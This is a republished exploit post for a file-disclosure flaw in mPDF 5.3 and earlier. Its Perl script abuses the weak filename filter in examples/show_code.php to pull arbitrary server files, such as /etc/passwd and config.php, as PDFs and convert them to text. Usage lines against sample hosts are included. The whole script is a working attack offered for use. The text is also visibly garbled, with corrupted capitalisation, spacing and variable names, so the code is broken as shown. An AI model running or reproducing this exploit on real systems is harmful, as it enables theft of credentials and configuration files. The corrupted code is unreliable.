Title: mPDF <= 5.3 File Disclosure
Author: ZadYree www.2cto.com
: Http://www.mpdf1.com/mpdf/download
Affected Versions: 5.3 and prior
Test Platform: Multiple
#! /Usr/bin/perl-U
= Head1 TITLE
MPDF <= 5.3 File Disclosure Exploit (0day)
= Head2 SYNOPSIS
-- Examples/show_code.php --
Preg_match ('/example [0] {0, 1} (\ d + )_(.*?) \. Php/', $ filename, $ m); <--- URI unproperly filtered.
$ Num = intval ($ m [1]);
$ Title = ucfirst (preg_replace ('/_/', '', $ m [2]);
If (! $ Num |! $ Title) {die ("Invalid file ");}
= Head2 DESCRIPTION
This vulnerability, due to a weak filter, lets you download any unprotected remote
Content, under PDF format.
The exploit may not work, depending on the set up htaccess/chmod rules on
Remote server.
= Head2 USAGE
Perl exploit. pl-r http://www.bkjia.com/mpdf53/../config. php
Perl exploit. pl-a http://p00niez.com/mpdf53//etc/passwd
Requiered modules:
PDF: OCR2
LWP: Simple
File: Type
Download a module:
Sudo cpan-fi install Module: Name
= Head3 Author
Zadyree ~ 3 LRVS Team | Blog: z4d.tuxfamily.org/blog
= Head3 Thanks
PHDays CTF-Yes, CTFs sometime do give you 0 dayz
3 LRVS Team-Support
= Cut
# ************* Configuration **************#
My $ cmd_file = '/tmp/b00mcallback ';
$ PDF: OCR2: CHECK_PDF = 0;
$ Del_temp_file = 1;
#*************************************** ***#
Use 5.010;
Use PDF: OCR2;
Use Getopt: Std;
Use LWP: Simple;
Use File: Type;
Use constant TRUE => 1;
Use constant FALSE => 0;
Help () unless (@ ARGV> = 2 );
My (% optz, $ uri );
Getopts ('ra', \ % optz );
My $ relative = $ optz {'R '};
My $ absolute = $ optz {'A '};
My $ help = $ optz {'H '};
Help () unless ($ absolute | $ relatife );
My ($ purl, $ fpath) = @ ARGV;
My $ name = $ purl;
$ Name = ~ S {http: // (. + ?) /. *} {$1 };
$ Name. = ("_". localtime (time). ". txt ");
$ Uri = '/examples/show_code.php? Filename = example03_LRVS.php/.../'if ($ absolute );
$ Uri = '/examples/show_code.php? Filename = example03_LRVS.php/.../'if ($ relative );
Help () unless ($ uri );
My $ furl = $ purl. $ uri. $ fpath;
$ Furl = ~ S # (//) # $ I ++? "/": $1 # eg; # Yeah that's twisted.
Say "[*] Retrieving content ...";
My $ file = make_file (get ($ furl ));
Die "[-] The stream you requested is not well formatted (forbidden page, etc). \ 012" unless is_pdf ($ file );
Say "[+] OK \ 012 [*] Converting format ...";
$ Pdf = PDF: OCR2-> new ($ file );
My $ text = $ pdf-> text;
$ Text = ~ S/[^ \ x0A-\ x7F] +? // Gm;
Open (my $ fh, '>', $ name );
Print $ fh $ text;
Close ($ fh );
Say "[+] OK \ 012 [+] Content successfully extracted! \ NFile: ", $ name;
Unlink ($ cmd_file) if ($ del_temp_file = TRUE );
Sub make_file {
My $ content = shift;
Open ($ fh, '>', $ pai_file );
Print $ fh $ content;
Close ($ fh );
Return ($ pai_file );
}
Sub is_pdf {
My $ checked_file = shift;
My $ ft = File: Type-> new ();
Return (1) if ($ ft-> mime_type ($ checked_file) eq "application/pdf ");
Return (0 );
}
Help () if ($ help );
Sub help {
Say <"EOF ";
Usage: perl $0 [-r |-a] http: // [mPDF URL] <file_to_read>
Details:
-R: Relative path (ex: ../file. php)
-A: Absolute path (ex:/etc/file. zd)
For any more information, feel free to contact ZadYree
Happy hacking!
EOF
Exit (0 );
}